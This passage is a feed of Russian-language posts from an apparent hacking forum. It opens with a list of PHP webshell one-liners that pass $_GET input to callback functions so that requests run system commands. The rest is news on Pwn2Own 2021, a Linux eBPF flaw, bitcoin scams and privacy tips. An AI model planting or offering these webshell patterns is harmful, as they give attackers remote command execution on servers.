/>?x=system&amp;_=id&amp;1<br />4. array_reduce</p> <p>Code:</p> <p>array_reduce([1],$_GET[x],$_GET[_]);<br />?x=system&amp;_=id<br />5. array_udiff_assoc, array_uintersect, array_uintersect_assoc</p> <p>Code:</p> <p>array_udiff_assoc($_GET,$_GET,$_GET[x]);<br />?x=system&amp;_=id<br />6. array_intersect_uassoc, array_diff_ukey, array_diff_uassoc</p> <p>Code:</p> <p>array_intersect_uassoc($_GET,$_GET,$_GET[x]);<br />?x=system&amp;id=1<br />7. array_uintersect_uassoc, array_udiff_uassoc</p> <p>Code:</p> <p>array_uintersect_uassoc($_GET, $_GET, $_GET[x],_);<br />?x=system&amp;_=id<br />8. usort, uasort, ArrayObject::uasort</p> <p>Code:</p> <p>usort($_GET,$_GET[x]);<br />?x=system&amp;_=id&amp;1<br />9. uksort, ArrayObject::uksort</p> <p>Code:</p> <p>uksort($_GET,$_GET[x]);<br />?x=system&amp;id=1&amp;1<br />10. call_user_func</p> <p>Code:</p> <p>call_user_func($_GET[x], $_GET[_]);<br />?x=system&amp;_=id<br />11. call_user_func_array</p> <p>Code:</p> <p>call_user_func_array($_GET[x], $_GET);<br />?_=id&amp;x=system<br />12. iterator_apply</p> <p>Code:</p> <p>iterator_apply(new ArrayObject([1]),$_GET[w],$_GET);<br />?_=id&amp;w=system<br />13. register_tick_function</p> <p>Code:</p> <p>declare(ticks=1);<br />register_tick_function($_GET[x],$_GET[_]);<br />?x=system&amp;_=id<br />14. forward_static_call</p> <p>Code:</p> <p>class A<br />{<br />&#160; &#160; function __construct() {<br />&#160; &#160; &#160; &#160; forward_static_call($_GET[x],$_GET[_]);<br />&#160; &#160; }<br />}<br />new A;<br />?x=system&amp;_=id<br />15 forward_static_call_array</p> <p>Code:</p> <p>class A<br />{<br />&#160; &#160; function __construct() {<br />&#160; &#160; &#160; &#160; forward_static_call_array($_GET[x],$_GET);<br />&#160; &#160; }<br />}<br />new A;<br />?_=id&amp;x=system<br />16. session_set_save_handler</p> <p>Code:</p> <p>session_set_save_handler($_GET[x],_,_,_,_,_);<br />ini_set('session.save_path',$_GET[_]);<br />session_start();<br />?x=system&amp;_=id<br />17. sqlite::createFunction</p> <p>Code:</p> <p>$x=$_GET[x];<br />$db = new SQLite3(':memory:');<br />$db-&gt;createFunction($x,$x);<br />$db-&gt;querySingle(&quot;select $x('$_GET[_]')&quot;);<br />?x=system&amp;_=id<br />18. spl_autoload_register</p> <p>Code:</p> <p>spl_autoload_register($_GET[x]);<br />new $_GET[_];<br />?x=system&amp;_=id<br />19. ob_start</p> <p>Code:</p> <p>ob_start($_GET[x]);<br />echo $_GET[_];<br />?&gt;<br />?x=system&amp;_=id<br />20. set_exception_handler</p> <p>Code:</p> <p>set_exception_handler($_GET[x]);<br />throw new Exception(&quot;;$_GET[_];#&quot;);<br />?_=id&amp;x=system<br />21. register_shutdown_function</p> <p>Code:</p> <p>register_shutdown_function($_GET[x],$_GET[_]);<br />?x=system&amp;_=id</p> mybb@mybb.ru (ФБР) Mon, 12 Apr 2021 06:52:18 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=72#p72 https://hacknet.6bb.ru/viewtopic.php?pid=71#p71 <p>Подведены итоги трёх дней соревнований Pwn2Own 2021, ежегодно проводимых в рамках конференции CanSecWest. Как и в прошлом году соревнования проводились виртуально и атаки демонстрировались online. Из 23 намеченных целей рабочие техники эксплуатации ранее неизвестных уязвимостей были продемонстрированы для Ubuntu Desktop, Windows 10, Сhrome, Safari, Parallels Desktop, Microsoft Exchange, Microsoft Teams и Zoom. Во всех случаях тестировались самые свежие версии программ, включающие все доступные обновления. Суммарный размер выплат составил один миллион двести тысяч долларов США (общий призовой фонд насчитывал полтора миллиона долларов).</p> <p>На соревнованиях были предприняты три попытки эксплуатации уязвимостей в Ubuntu Desktop. Первая и вторая попытки были засчитаны и атакующим удалось продемонстрировать локальное повышение привилегий через эксплуатацию ранее неизвестных уязвимостей, связанных с переполнением буфера и двойном освобождении памяти (в каких именно компонентах проблемы пока не сообщается, до раскрытия данных разработчикам даётся 90 дней на исправление ошибок). За данные уязвимости выплачены премии в 30 тыс. долларов.</p> <p>Третья попытка, предпринятая другой командой в категории локальное превышение привилегий, удалась лишь частично - эксплоит сработал и дал возможность получить доступ root, но атака была зачтена не полностью, так как связанная с уязвимостью ошибка уже была известна разработчикам Ubuntu и обновление с исправлением находилось на стадии подготовки.</p> <p>Успешная атака также была продемонстрирована для браузеров на основе движка Chromium - Google Chrome и Microsoft Edge. За создание эксплоита, позволяющего выполнить свой код при открытии специально оформленной страницы в Chrome и Edge (был создан один универсальный эксплоит для двух браузеров), была выплачена премия в 100 тысяч долларов. Исправление планируется опубликовать в ближайшие часы, пока известно лишь то, что уязвимость присутствует в процессе, отвечающем за обработку web-контента (renderer).</p> <p>Другие успешные атаки:</p> <p>200 тысяч долларов за взлом приложения Zoom (удалось выполнить свой код, отправив сообщение другому пользователю, без необходимости совершения со стороны получателя каких-либо действий). Для атаки использовались три уязвимости в Zoom и одна в операционной системе Windows.<br />200 тысяч долларов за взлом Microsoft Exchange (обход аутентификации и локальное повышение привилегий на сервере для получения прав администратора). Другой командной был продемонстрирован ещё один успешно работающий эксплоит, но вторая премия не была выплачена, так как те же ошибки уже были использованы первой командой.<br />200 тысяч долларов за взлом Microsoft Teams (выполнение кода на сервере).<br />100 тысяч долларов за эксплуатацию Apple Safari (целочисленное переполнение в Safari и переполнение буфера в ядре macOS для обхода sandbox и выполнении кода на уровне ядра).<br />140 тысяч долларов за взлом Parallels Desktop (выход из виртуальной машины и выполнение кода в основной системе). Атака совершена через эксплуатацию трёх разных уязвимостей - утечки неинициализированной памяти, переполнения стека и целочисленного переполнения.<br />Две премии по 40 тысяч долларов за взломы Parallels Desktop (логическая ошибка и переполнение буфера, позволившие выполнить код во внешней ОС через действия внутри виртуальной машины).<br />Три премии по 40 тысяч долларов за три успешных эксплуатации Windows 10 (целочисленное переполнение, обращение к уже освобождённой памяти и состояние гонки, позволившие добиться получения привилегий SYSTEM).<br />Предприняты, но не увенчались успехом, попытки взлома Oracle VirtualBox. Номинации за взлом Firefox, VMware ESXi, Hyper-V client, MS Office 365, MS SharePoint, MS RDP и Adobe Reader осталась невостребованными. Также не нашлось желающих продемонтрировать взлом информационной системы автомобиля Tesla, несмотря на приз в 600 тысяч долларов плюс автомобиль Tesla Model 3.</p> mybb@mybb.ru (ФБР) Sun, 11 Apr 2021 11:17:43 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=71#p71 https://hacknet.6bb.ru/viewtopic.php?pid=70#p70 <p>В подсистеме eBPF, позволяющей запускать обработчики для трассировки, анализа работы подсистем и управления трафиком, выполняемые внутри ядра Linux в специальной виртуальной машине с JIT, выявлена уязвимость (CVE-2021-29154), позволяющая локальному пользователю добиться выполнения свого кода на уровне ядра. Проблема проявляется вплоть до выпуска 5.11.12 (включительно) и ещё не исправлена в дистрибутивах (Debian, Ubuntu, RHEL, Fedora, SUSE, Arch). Исправление доступно в виде патча.</p> <p>По заявлению исследователей, выявивших уязвимость, им удалось разработать рабочий прототип эксплоита для 32- и 64-разрядных систем x86, который может быть использован непривилегированным пользователем. При этом компания Red Hat отмечает, что опасность проблемы зависит от доступности пользователю системного вызова eBPF. Например, в RHEL и большинстве других дистрибутивов Linux в конфигурации по умолчанию уязвимость может быть эксплуатирована при включении BPF JIT и наличии у пользователя прав CAP_SYS_ADMIN. В качестве обходной меры защиты рекомендуется отключить BPF JIT при помощи команды:</p> <p>echo 0 &gt; /proc/sys/net/core/bpf_jit_enable</p> <p>Проблема вызвана ошибкой вычисления смещения для команд ветвления в процессе генерации машинного кода JIT-компилятором. В частности, при генерации инструкций ветвления не учитывается, что смещение может измениться после прохождения стадии оптимизации. Указанная недоработка может использоваться для формирования аномального машинного кода и его выполнения их на уровне ядре.</p> <p>Примечательно, что это не единственная уязвимость в подсистеме еBPF за последнее время. В конце марта в ядре были выявлены ещё две уязвимости (CVE-2020-27170, CVE-2020-27171), предоставляющие возможность использовать еBPF для обхода защиты от уязвимостей класса Spectre, позволяющих определять содержимое памяти ядра в результате создания условий для спекулятивного выполнения определённых операций. Для атаки Spectre требуется наличие в привилегированном коде определённой последовательности команд, приводящих к спекулятивному выполнению инструкций. В еBPF найдено несколько способов генерации подобных инструкций через манипуляции с передаваемыми для выполнения BPF-програмами.</p> <p>Уязвимость CVE-2020-27170 вызвана наличием в верификаторе BPF манипуляций с указателями, вызывающими спекулятивные операции обращения к области вне границ буфера. Уязвимость CVE-2020-27171 связана с ошибкой целочисленной арифметики (integer underflow) при работе с указателями, приводящей к спекулятивному обращению к данным вне буфера. Указанные проблемы уже устранены в выпусках ядра 5.11.8, 5.10.25, 5.4.107, 4.19.182 и 4.14.227, а также вошли в состав обновлений ядра большинства дистрибутивов Linux. Исследователями подготовлен протитип эксплоита, позволяющий непривилегированному пользователю извлечь данные из памяти ядра.</p> mybb@mybb.ru (ФБР) Sun, 11 Apr 2021 11:15:36 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=70#p70 https://hacknet.6bb.ru/viewtopic.php?pid=69#p69 <p>По состоянию на 16 декабря биткойн вырос примерно на 195% с начала года, превысив 23000 долларов, но что движет этим стремительным ростом? Причины его высокой оценки разнятся, но Биткойн вырос из того, что многие когда-то считали мошенничеством, в нечто, что превратилось в жизнеспособные инвестиции, сделанные известными инвесторами-миллиардерами, крупными организациями и розничными инвесторами. Почему эти инвесторы так оптимистично настроены по отношению к Биткойну даже после того, как он превысил исторические максимумы?</p> mybb@mybb.ru (ФБР) Mon, 05 Apr 2021 07:10:58 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=69#p69 https://hacknet.6bb.ru/viewtopic.php?pid=68#p68 <p>Себастьян всегда будет помнить момент, когда он потерял 407 000 фунтов стерлингов, с равной долей гнева и стыда.</p> <p>В остальном ночь, предшествовавшая этому, была незабываемой.</p> <p>Он и его жена посмотрели сериал на Netflix, прежде чем она легла спать и оставила его на диване возиться с телефоном.</p> <p>Затем он получил уведомление в Twitter с новостями от Илона Маска.</p> <p>Себастьян сказал Би-би-си: «Маск написал в Твиттере:« Dojo 4 Doge? » и мне стало интересно, что это значит.</p> <p>«Ниже была ссылка на новое мероприятие, поэтому я щелкнул по ней и увидел, что он раздает биткойны!»</p> <p>Себастьян перешел по ссылке на профессионально выглядящий веб-сайт, где раздача биткойнов, похоже, была в самом разгаре.</p> <p>Был таймер обратного отсчета, и сайт обещал участникам, что они могут удвоить свои деньги.</p> <p>Соревнование, по-видимому, проводилось командой Tesla Илона Маска. Он предлагал людям отправлять что-либо от 0,1 биткойна (стоимостью примерно 4300 фунтов стерлингов) до 20 биткойнов (примерно 860 000 фунтов стерлингов), и команда отправляла обратно вдвое большую сумму.</p> <p>'Возьми максимум'<br />Себастьян дважды проверил логотип проверки рядом с именем Илона Маска, а затем попытался решить, отправлять ли ему пять или 10 биткойнов.</p> <p>«« Возьми максимум », - подумал я, это определенно реально, поэтому я отправил 10 биткойнов».</p> <p>Следующие 20 минут, пока таймер закончился, Себастьян ждал, пока приз попадет в его биткойн-кошелек.</p> <p>Из своего дома в Кельне в Германии он сидел и обновлял экран каждые 30 секунд.</p> <p>Он увидел, как мистер Маск отправил новый загадочный твит, и был уверен, что раздача была реальной.</p> <p>Но постепенно таймер на сайте опустился до нуля, и Себастьян сказал: «Тогда я понял, что это большая подделка.</p> <p>«Я упал головой на подушки дивана, и мое сердце так сильно билось. Я думал, что просто выбросил все, что изменило мою семью, свой фонд досрочного выхода на пенсию и все предстоящие каникулы с моими детьми.</p> <p>«Я поднялся наверх и сел на край кровати, чтобы рассказать жене. Я разбудил ее и сказал, что совершил большую ошибку, действительно большую ошибку».</p> <p>Себастьян, который спросил, что Би-би-си не использует его настоящее имя, не спал в ту ночь.</p> <p>Вместо этого он часами отправлял электронное письмо на сайт мошенников и твитнул фальшивую учетную запись Илона Маска в Твиттере, пытаясь вернуть часть или все свои деньги.</p> <p>Однако в конце концов он начал соглашаться, что деньги ушли навсегда.</p> <p>На расстоянии 133 миль в Амстердаме аналитики Whale Alert с ужасом наблюдали, как 10 биткойнов Себастьяна были переведены, а затем анонимно обналичены несколько дней спустя.</p> <p>Компания по анализу блокчейнов в течение нескольких месяцев пыталась заставить власти принять меры против мошенничества, но заявляет, что ничего не предпринимается.</p> <p>Аналитики используют публичный реестр, который показывает все движение криптовалют в режиме реального времени, чтобы отслеживать тенденции и отслеживать деньги.</p> <p>Они определили, какими биткойн-адресами или кошельками управляют так называемые «мошенники с раздачей подарков», и отследили растущие суммы денег, которые они зарабатывают. 10 биткойнов Себастьяна были самой большой потерей за одну транзакцию, которую они когда-либо регистрировали.</p> <p>Рекордные суммы кражи<br />Исследователи говорят, что мошенники зарабатывают рекордные суммы в 2021 году. Раздаваемые банды уже заработали более 18 миллионов долларов (13 миллионов фунтов стерлингов) за первые три месяца этого года по сравнению с 16 миллионами долларов, заработанными в общей сложности за весь 2020 год.</p> <p>Данные также свидетельствуют о том, что количество жертв в этом году будет больше, чем в предыдущие годы. В 2020 году около 10500 человек попались на мошенничество, но уже в этом году исследователи говорят, что они отследили 5600 отправителей денег.<br />Основатель Whale Alert Франк ван Вирт говорит, что трудно сказать, почему мошенничество не только преобладает, но и становится все более успешным.</p> <p>Фактические методы преступников не сильно изменились с момента появления мошенничества в 2018 году. Они создают аккаунты в Твиттере, похожие на аккаунты таких знаменитостей, как Илон Маск или инвестор-миллиардер Чамат Палихапития.</p> <p>В некоторых случаях, как в случае с Себастьяном, преступники используют украденные учетные записи известных людей, чтобы убедиться, что у них есть синяя галочка «подтверждено», чтобы счет выглядел более надежным.</p> <p>Они ждут, пока реальные аккаунты напишут в Твиттере, и публикуют ответ, чтобы все выглядело так, будто знаменитости разместили мошенничество среди миллионов своих подписчиков.</p> <p>Twitter - популярная платформа, но мошенничество с бесплатными подарками также можно найти на YouTube, Facebook и Instagram.</p> mybb@mybb.ru (ФБР) Mon, 05 Apr 2021 07:07:00 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=68#p68 https://hacknet.6bb.ru/viewtopic.php?pid=67#p67 <p>Ирландская полиция расследует массовое мошенничество с биткойнами, которое якобы похитило миллионы у состоятельных людей<br /><br /></p> <p>Полиция Ирландии находится в состоянии повышенной готовности из-за растущего числа дел, связанных с мошенничеством с биткойнами, нацеленным на состоятельных людей в стране. Ситуация стала тревожной, поскольку власти уже заметили подозрительные операции на крупные суммы. Власти уже обыскали одно имущество, связанное с одним из подозреваемых. По данным The Irish Times, Гардаи (полиция Ирландии) расследует то, что они считают крупным крипто-мошенничеством, преступники которого могут проживать в стране. Местный банк уже выразил обеспокоенность по поводу подозрительной транзакции на 500 000 евро (586 500 долларов США) с неактивного счета. После опроса, проведенного Гардаем в отношении пожилого клиента, который хотел инвестировать такую сумму денег в то, что, по его мнению, было законной возможностью для криптовалютного бизнеса, он принял совет полиции не отправлять фиатные деньги. Но, по данным СМИ, похоже, что до того, как они заблокировали перевод 500 000 евро в кошелек преступников, имели место и другие аналогичные транзакции. Фактически, жертва хотела обменять деньги на криптовалюту, а затем поместить их в биткойн-кошелек (BTC), принадлежащий якобы мошенникам. Хотя на момент публикации в прессе не было произведено никаких арестов, ирландская полиция уже произвела обыск на территории на юге Дублина, предположительно связанной с некоторыми подозреваемыми. В отчете говорится, что мобильные телефоны, компьютеры, наличные деньги, дизайнерские сумки и ювелирные изделия были обнаружены и изъяты властями. Более того, расследования сосредоточены на том, как преступники - некоторые из них предположительно являются иностранными гражданами и проживают в Дублине - подошли к жертвам и завоевали их доверие.</p> mybb@mybb.ru (ФБР) Mon, 05 Apr 2021 07:02:36 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=67#p67 https://hacknet.6bb.ru/viewtopic.php?pid=63#p63 <p>6 конфиденциальных альтернатив приложениям, которые вы используете каждый день<br />6 конфиденциальных альтернатив приложениям, которые вы используете каждый день, изображение №1<br />Мессенджеры, карты, музыкальные плееры и многие другие популярные приложения собирают информацию о вас, чтобы зарабатывать на показе рекламы. Однако на рынке доступны их аналоги, которые помогут защитить ваши данные и ориентированы исключительно на сохранение конфиденциальности своих пользователей.</p> <p>Большинство людей настолько привыкли использовать популярные приложения, что уже даже перестали задумываться о том, как они работают и сколько личной информации собирают о своих пользователях. Бесплатные программы, которые стали широко известными, зарабатывают на показе рекламы. Это означает, что они осуществляют сбор данных о ваших лайках, онлайн-активности и использовании сторонних приложений.</p> <p>На рынке доступные более конфиденциальные варианты: приложения, которые защитят ваши данные от чужих глаз и нетерпеливых рекламодателей. Они легко могут получить ваше признание, если вы только познакомитесь с ними поближе.</p> <p>Несомненно, Apple и Google используют разные подходы к конфиденциальности своих пользователей - Apple зарабатывает деньги, продавая свою технику, тогда как Google становится богаче, продавая рекламу, для чего необходим сбор данных и проведение профилирования. Несмотря на то, что Google обещает сохранить ваши личные данные в тайне, он действительно продает рекламу того профиля пользователя, который сам создает.</p> <p>Для сравнения можно отметить, что многие приложения Apple уже достаточно хороши с точки зрения конфиденциальности. Это те же Safari, Mail и Apple Maps. Тем не менее, в этой статье будут представлены альтернативные программы для известных приложений, доступных как на Apple, так на Android.</p> <p>Signal для обмена сообщениями<br />6 конфиденциальных альтернатив приложениям, которые вы используете каждый день, изображение №2<br />Есть несколько популярных приложений для обмена текстовыми сообщениями, но немногие из них так же сильно ориентированы на конфиденциальность, как Signal (Android, iOS) и доступны сразу же на нескольких платформах. Как и следовало ожидать, в этой программе при отправке и получении сообщений используется сквозное шифрование. Более того, есть опция исчезающих сообщений, так что вы не оставите никаких следов своей онлан-активности.</p> <p>Хотя Signal, возможно, и не имеет богатый функционал, как некоторые другие мессенджеры, он поддерживает голосовые и видеозвонки, а также групповые чаты, передачу файлов, прослушивание аудио и открытие GIF-файлов. Ваша самая большая проблема может состоять только в том, чтобы убедить всех знакомых и друзей перейти на его использование каждый день.</p> <p>Firefox для просмотра страниц в Интернете<br />6 конфиденциальных альтернатив приложениям, которые вы используете каждый день, изображение №3<br />В то время как некоторые веб-браузеры уже долгое время обещают поставить конфиденциальность своих пользователей на первое место в списке своих приоритетов, Firefox (Android, iOS) уже является отличным браузером с точки зрения функций, кросс-платформенной совместимости и скорости работы. Впечатляющий список функций начинается с того, что Firefox называет улучшенной защитой, при которой наиболее агрессивные онлайн-трекеры автоматически блокируются при просмотре веб-страниц.</p> <p>Погрузитесь глубже в безграничные настройки Firefox, и вы сможете сами выбирать, какие плагины нужно заблокировать, а также будете способны решить, какие данные должны собираться о вас при открытии новых сайтов и страниц в Интернете. Историю просмотра можно стереть за пару нажатий клавиш. И, конечно, есть режим инкогнито, если вы хотите просматривать сайты, не оставляя никаких следов своих действий.</p> <p>DuckDuckGo для поиска информации в Интернете<br />6 конфиденциальных альтернатив приложениям, которые вы используете каждый день, изображение №4<br />Привлекательность DuckDuckGo (Android, iOS) заключается в том, что он действительно не заинтересован в отслеживании того, что вы ищете в Интернете, и показе рекламы на основе вашей личной информации. Открытые вкладки и историю просмотров можно удалить в один клик, в то время как трекеры, с которыми вы сталкиваетесь во время своего путешествия по страницам сайтов в Интернете, автоматически блокируются, чтобы они не смогли отслеживать ваши действия.</p> <p>Приложение DuckDuckGo на самом деле является веб-браузером и поисковиком в одном флаконе. Отдельным сайтам присваивается рейтинг конфиденциальности по мере их посещения вами, и приложение предоставляет вам полную информацию о том, какие компании пытаются отслеживать ваши перемещения в Интернете. Простой и эффективный способ оставаться конфиденциальным во время своей онлайн-деятельности.</p> <p>OsmAnd для ориентирования на местности (картографическое приложение)<br />6 конфиденциальных альтернатив приложениям, которые вы используете каждый день, изображение №5<br />Работа OsmAnd (Android, iOS) базируется на данных, получаемых от OpenStreetMap, своего рода эксперта в сфере картографических приложений. Эта программа имеет полный набор функций, как и любые другие карты: пошаговые инструкции, просмотр карт в автономном режиме, информация о достопримечательностях и общественных местах рядом с вами. Более того, приложение не создает ваш маркетинговый профиль для его продажи рекламодателям.</p> <p>Есть поддержка режима построения маршрута во время езды на велосипеде и ходьбы пешком, а также во время вождения транспортного средства. Пользователи могут сами выбрать вид карты, а также имеют возможность быстро добавлять в закладки или делиться определенными точками на карте. Вы также способны купить определенные области на карте для их просмотра, но в самом начале можно бесплатно скачать семь карт определенной местности по вашему выбору.</p> <p>ProtonMail для отправки писем по электронной почте<br />6 конфиденциальных альтернатив приложениям, которые вы используете каждый день, изображение №6<br />Если вы хотите, чтобы ваша электронная почта была защищена от посторонних глаз, а анализ отправки сообщений не содействовал показу рекламы и рекомендациям других сервисов, то ProtonMail (Android, iOS) — один из лучших доступных на рынке вариантов. Это программа с открытым исходным кодом, полученные и отправленные сообщения в которой полностью зашифрованы. Она также имеет такую классную функцию, как самоуничтожающиеся сообщения.</p> <p>Все необходимое шифрование происходит в самой программе, поэтому все, что вы видите, — это удобная почта с привычными вами функциями, такими как фильтрация сообщений и папка спам. ProtonMail предоставляет вам полную конфиденциальность ведь никто, кроме предполагаемых получателей, не сможет прочитать ваши сообщения (включая саму команду разработчиков). Стоит отметить, что большинство функций доступны абсолютно бесплатно.</p> <p>Jumbo для пользования социальными сетями<br />6 конфиденциальных альтернатив приложениям, которые вы используете каждый день, изображение №7<br />Jumbo (Android, iOS) не является как таковой заменой приложениям для пользования социальными сетями, но программа может помочь вам защитить данные в социальных сетях, где вы и ваши друзья уже зарегистрированы. Это касается Instagram, Facebook и Twitter. Большинство функций программы платные, однако много опций доступны и без оформления надлежащей подписки.</p> <p>Одна из лучших функций, которой обладает Jumbo, - это автоматическое удаление ваших постов по истечении определенного времени, так что вы никогда не будете оставлять за собой цифровых следов. Приложение также подскажет вам, как повысить конфиденциальность в ваших социальных сетях (например, отключив распознавание лиц или отметки на фото друзей).</p> mybb@mybb.ru (ФБР) Thu, 18 Mar 2021 17:59:13 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=63#p63 https://hacknet.6bb.ru/viewtopic.php?pid=62#p62 <p>Семь секретов, которые не дадут взломать ваш Android-смартфон<br />Семь секретов, которые не дадут взломать ваш Android-смартфон, изображение №1<br />Инструкция, как защитить ваши данные на телефоне. Всё, чтобы вы чувствовали себя в безопасности.</p> <p>Вся ваша жизнь — на устройстве у вас в руках. От почты и личных сообщений до фотографий и видео с самыми ценными моментами — все это в телефоне. Скорее всего, он не защищен достаточно, чтобы обезопасить ваши данные от нежелательного доступа. Это актуально и для телефона, которым вы пользуетесь несколько лет, и для только что купленного.</p> <p>В защите от взлома существуют две стороны, цифровая и физическая. Цифровая — это информация, которую телефон собирает о вас. Физическая — физический доступ к телефону. Представим ситуацию: телефон украли и вор шантажирует вас при помощи фото — для этого нужна физическая сторона защиты.</p> <p>Перед «прокачкой» телефона стоит поговорить о Google, компании, которая разрабатывает операционную систему Android. Она — один из крупнейших сборщиков данных. Её бизнес-модель выглядит так: рекламодатель хочет рассказать о своём продукте, выбирает целевую аудиторию (например, люди, которые ищут информацию о телевизорах), а Google показывает этой группе рекламу. То есть, продает данные о своих пользователях.</p> <p>Так что, если вы хотите большей конфиденциальности при повседневном использовании телефона, возможно, вам стоит подумать о переходе на iOS. Если не хотите переходить, вот несколько способов улучшить конфиденциальность вашего Android-устройства.</p> <p>Изучите азы<br />Изучение основ — это первое, с чего следует начать. Первая линия защиты — это блокировка экрана. Кстати, ПИН-код или пароль лучше, чем графический ключ.</p> <p>Стоит использовать менеджер паролей для создания уникальных паролей от всех онлайн-аккаунтов. Также лучше убедиться, что двухфакторная аутентификация включена для как можно большего количества учетных записей. Если у какого-либо из сервисов произойдёт утечка данных, злоумышленники могут подобрать данные для других аккаунтов. С менеджером паролей и двухфакторной авторизацией у них ничего не получится.</p> <p>Автоматическое обновление приложений должно быть включено. Это защитит от багов, которыми могут воспользоваться злоумышленники. Для приложений — в настройках Play Store включите их автоматическое обновление. Для всей операционной системы Android — в настройках найдите «обновления системы». Учтите, что у каждого телефона этот пункт может находиться в разных местах.</p> <p>Семь секретов, которые не дадут взломать ваш Android-смартфон, изображение №2<br />Также стоит зайти в настройки приложений в Android и проверить, какие разрешения вы предоставили каждому приложению: вполне вероятно, что у некоторых можно отключить доступ к геолокации или доступ к фотографиям.</p> <p>Мы изучили основы — теперь переходим к чему-то более серьезному.</p> <p>Поставьте пароль на приложения<br />У вас уже есть пароль или PIN-код на телефоне, чтобы его не могли разблокировать, если он попадет в чужие руки. Но иногда этого недостаточно. Бывает, что вы даёте уже разблокированный телефон другому человеку — например, показываете кому-то фотографии или даёте поиграть своим детям. Тогда стоит поставить дополнительный пароль на приложения. В отличие от Apple, Google позволяет программам запрашивать разрешение на управление другими программами. Это означает, что возможна блокировка паролем отдельных приложений.</p> <p>Чтобы заблокировать одно приложение, понадобится другое приложение. Таких программ куча в Play Store, поэтому стоит быть осторожным. Если в нём полно рекламы, нет четкой политики конфиденциальности или оно не от надежного разработчика, то вам, вероятно, следует избегать его.</p> <p>Семь секретов, которые не дадут взломать ваш Android-смартфон, изображение №3<br />Norton App Lock — неплохое решение для начала. Оно от надёжного разработчика — предыдущий продукт компании Norton VPN — один из самых популярных VPN в мире. Программа позволяет использовать один и тот же пароль для отдельных приложений или групп приложений.</p> <p>У Xiomi есть системная блокировка приложений. В настройках зайдите в «приложения», там в «безопасность приложений». Выберите нужные приложения и поставьте пароль. Теперь в них можно будет войти, только если правильно ввести пароль.</p> <p>Скройте уведомления<br />Хоть мы сейчас и не особо часто выходим из дома, нет ничего более унизительного, чем чувство, когда кто-то смотрит через плечо в общественном транспорте и видит всплывающие уведомления с сообщениями.</p> <p>Семь секретов, которые не дадут взломать ваш Android-смартфон, изображение №4<br />Этого можно избежать. В настройках найдите «уведомления», там выберите «экран блокировки» и поставьте «скрывать содержимое уведомлений». Теперь содержимое уведомлений не будет показываться на экране блокировки.</p> <p>Проверьте на сталкерские приложения<br />В 2020 году идет тревожный рост использования сталкерских приложений. На телефонах сталкерское ПО проявляется в виде приложений, работающих в фоновом режиме, которые могут записывать и отслеживать все, что делает человек. Приложение легко не заметить, если не искать его специально.</p> <p>Это приложение может попасть вместе с вирусом из Интернета или если кто-то, у кого есть доступ к смартфону, без вашего ведома установит его.</p> <p>Если кто-то установил на ваше устройство сталкерское ПО, есть несколько признаков, по которым можно его заметить. Например, телефон сильно нагревается и быстро разряжается.</p> <p>Семь секретов, которые не дадут взломать ваш Android-смартфон, изображение №5<br />Если такое происходит, телефон стоит проверить антивирусными програмами. Например, антивирусом Касперского и антивирусом Avast.</p> <p>Используйте VPN<br />VPN — не самое надежное средство защиты, но оно может помочь. Программа создает зашифрованное соединение от вашего устройства к удаленному серверу и пропускает через него интернет-трафик: это не позволяет вашему интернет-провайдеру знать и хранить историю браузера. Журналисты, активисты и люди, стремящиеся избежать государственной слежки, являются одними из самых частых пользователей VPN.</p> <p>Семь секретов, которые не дадут взломать ваш Android-смартфон, изображение №6<br />Но какой VPN выбрать? Существует много VPN, и все они стоят по-разному. Лучше всего выбрать платный VPN — с ними меньше шансов, что компания будет продавать ваши данные рекламодателям. У них часто есть семейные планы, по которым сетью можно пользоваться с нескольких устройств — можно пользоваться и с телефона, и с компьютера. У Wired есть список лучших VPN, на первых местах там Windscribe и ExpressVPN. Они оба работают быстро, также они доказали, что не хранят журналы активности в интернете, в отличие от некоторых других VPN.</p> <p>Измените приложения по умолчанию<br />Если у вас телефон на Android, вы, вероятно, не задумывались о приложениях, которые используете для поиска, голосовых помощников, телефона и SMS. Этим летом Google сделал экран выбора на новых телефонах Android, после того, как Европейская комиссия по вопросам конкуренции оштрафовала компанию на 3,8 миллиарда фунтов стерлингов. Этот экран позволяет выбрать свою поисковую систему при первоначальной настройке. То есть, можно выбрать что-то кроме Google.</p> <p>Семь секретов, которые не дадут взломать ваш Android-смартфон, изображение №7<br />В настройках найдите пункт «приложения», выберите «все приложения», сверху будут три точки или шестеренка, там будут «приложения по умолчанию». В этом меню можно поменять приложения на те, которые вы используете чаще. Можно поменять не только поиск, но браузер, голосового помощника, голосовой ввод, приложение для звонков и приложение для SMS. Несколько альтернатив с повышенной безопасностью: браузер Firefox, браузер и поиск DuckDuckGo, приложение для SMS — Signal.</p> <p>Зашифруйте все<br />Пароль защитит ваши данные от слишком любопытного родственника или от воришки, который украл ваш телефон на улице. Но только на таком примитивном уровне. Если кто-то по-настоящему захочет получить данные с телефона, пароль не будет для него помехой — он просто подключится напрямую к диску. Чтобы избежать этого, необходимо зашифровать диск. Шифрование подразумевает, что к файлам не сможет получить доступ никто, кто пытается извлечь их с вашего устройства, если у него нет пароля. «Шифрование гарантирует, что даже если неавторизованная сторона попытается получить доступ к данным, они не смогут их прочитать», — утверждает Google.</p> <p>Семь секретов, которые не дадут взломать ваш Android-смартфон, изображение №8<br />Вы можете зашифровать свой телефон через настройки — в поиске наберите «зашифровать» и выберите «зашифровать данные». Для этого вам нужно будет ввести или создать PIN-код и убедиться, что телефон заряжен. Шифрование всего устройства может занять некоторое времени, поэтому, вероятно, лучше это сделать, когда не вы не будете им пользоваться. Google сделал обязательным шифрование устройств с Android с 2015 года и прилагает все усилия, чтобы сделать его менее ресурсоемким на более дешевых устройствах.</p> mybb@mybb.ru (ФБР) Thu, 18 Mar 2021 17:58:31 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=62#p62 https://hacknet.6bb.ru/viewtopic.php?pid=61#p61 <p>Эксперты рассказали, как власти по всему миру следят за гражданами во время пандемии<br />Эксперты рассказали, как власти по всему миру следят за гражданами во время пандемии, изображение №1<br />Весной 2020 года «РосКомСвобода» совместно с белорусской правозащитной организацией Human Constanta запустила интерактивную карту Pandemic Big Brother , на которой отображаются случаи нарушения и предпосылки к нарушениям гражданских прав с применением цифровых технологий.</p> <p>В общей сложности было выявлено 135 специальных приложений для отслеживания контактов с больными 